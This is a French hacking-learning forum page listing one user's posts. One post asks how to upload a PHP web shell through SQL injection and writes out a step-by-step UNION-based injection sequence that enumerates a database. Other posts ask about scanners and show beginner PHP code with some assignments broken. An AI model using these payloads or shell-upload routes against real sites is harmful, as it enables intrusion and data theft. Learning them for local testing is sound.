logo Homepage
+  NewbieContest
Username:
Password:
Accueil Aide Rechercher Identifiez-vous Inscrivez-vous
  Voir les messages
Pages: [1]
1  Général / Général / besoin d'aide apprentissage faille web. le: 05 Janvier 2014 à 16:33:05
Bonjour,

Je recherche une ou des personnes assez douer en faille web pour m'apprendre un peut, je fais divers test de piratage en local et notamment les faille web, j'aimerais savoir comment puis-je uploader un shell php a travers une injection sql sans passer par le panel mysql>

Je sais qu'il existe 3 manière pour le faire :
------------------------------------------------------

1- En obtenant les users et mots de passe de la base de donnée mysql> (privilègue root)
2- Par l’intermédiaire d'un formulaire si dans l'administration de ce site il y en a un de présent, ( cela peut comporter des contournement de forcing a l'upload).
3- En modifiant un module (par exemple joomla).


donc voilà ma procédure de base ...

http://localhost/index.php?id=16
http://localhost/index.php?id=16+order+by+3--
http://localhost/index.php?id=-16+union+all+select+1,2--
http://localhost/index.php?id=-16+union+all+select+version(),2--
http://localhost/index.php?id=-16+union+all+select+user(),2--
http://localhost/index.php?id=-16+union+all+select+database(),2--
http://localhost/index.php?id=-16+union+all+select+1,table_name+from+information_schema.tables--
http://localhost/index.php?id=-16+union+all+select+1,group_concat(schema_name)+from+information_schema.schemata--
http://localhost/index.php?id=-16+union+all+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema=database()--

je voudrais procéder ainsi pour l'upload shell ou par xss (mais ça j'en est aucune idée)


si une personne aurait une solution autre que cela merci d'avance.
2  Divers / Linux / Re : audit local , souci ? le: 03 Janvier 2014 à 13:31:20
Je suis d'accord avec toi  mais pourtant la SOL est une faille basique ?
donc par conclusion nikto aurait du la trouver.
3  Divers / Linux / audit local , souci ? le: 03 Janvier 2014 à 13:23:27
Bonjour,

A tout ceux qui maitrise linux, j'aimerais savoir quel sont les outils performants pour faire du pentesting car, je rencontre un petit souci j'ai un site en locale sur ma machine , j'ai installer un site dessus puis  trouver différente faille entre SQL et XSS , le problème est le suivant aucun logiciel digne de ce nom n'est capable de dénicher une faille sql .

je m’explique :

la faille que j'ai trouver sur mon site locale pour faire un audit avant de le mettre en ligne est une faille sql que j'ai tester en manuelle j'ai donc réussi a descendre toute la base de donnée comme ça  mais, la question qui me trotte dans la tête pourquoi nikto par exemple n'a pas été foutu de trouver la faille que j'ai établie en manuelle.
'
enfin bref j'ai tester différent logiciel de scanner de faille et je constate qu' enfin compte la plupart des softs (scanner d'audit)  ne sont pas aussi performant que les techniques de la vielle école.


donc je poste ce message pour savoir ce que vous avez a me proposer ...
4  Général / Général / recherche connaissance technique audite de securité le: 16 Décembre 2013 à 17:58:50
Bonjour,

A tous je suis nouveau sur votre forum je tiens à signaler qu'il est intéressant de voir la diversité des choses, donc ma venue ici est purement amicale.

Je suis à me relancer dans le bain de la sécurité informatique je recherche des personnes aillant connaissance dans ce domaine pour m'apprendre et me donner quelque explication de ce qui se fait en ce moment dans le milieux la scène française en matière de hacking.

n'hésitez pas à m'envoyer un message

Merci à vous 
5  Programmation / Langages Web / Souci de Formaulaire PHP le: 20 Août 2012 à 10:19:50
Bonjour,

Je suis nouveaux chez vous et j'espère trouver de l'aide ici, je rencontre un souci avec mon scripte php, étant débutant j'ai beaucoup de mal à rajouté un paramètre pour que mon projet soit fini.

Comme on peut le voir c'est un formulaire qui affiche les fichiers d'un dossier sur mon ftp dans un menue déroulant, jusqu'à la tout fonctionne bien mais, le problème, quand je sélectionne le fichier dans mon menue déroulant et que je clique sur supprimer celui si ne se supprime pas pourriez-vous m'aider à compléter les paramètres qui me manquent, je ne trame réellement plus rien, j'ai tenté le chmod mais rien, après beaucoup me font tourner en rond.


Code:
<?php
if(isset($_POST['supprimer'])){
    // Le bouton supprimer a été cliqué
    //recup du fichier choisi dans la liste déroulante
    $fichier_a_supprimer=$_POST['liste_fichiers'];
    //etc....
}
?>
<form action='' method='post' name='Form'>
<table width='100%' border='0' cellspacing='1' cellpadding='1'>
<tr><td>
<label>Fichier</label> :
</td>
<td><select name="liste_fichiers">
<?php
$dirname 'Vos-Fichiers-Uploder';
$dir opendir($dirname);
$array_liste_fichiers=array();
while($file readdir($dir)) {
    if($file != '.' && $file != '..' && !is_dir($dirname.$file))
    {
        $array_liste_fichiers[]=$file;
    }
}
closedir($dir);
for($i=0;$i<sizeof($array_liste_fichiers);$i++){
    echo '<option value="'.$array_liste_fichiers[$i].'">'.$array_liste_fichiers[$i].'</option>';
}
?>
</select>
</td></tr>
<tr><td colspan="2"> <input type="submit" name="supprimer" value="Supprimer" ></td></tr>
</table>
</form>

Merci de vos réponses !
Pages: [1]
Powered by SMF 1.1.21 | SMF © 2006-2011, Simple Machines MySQL | PHP | XHTML | CSS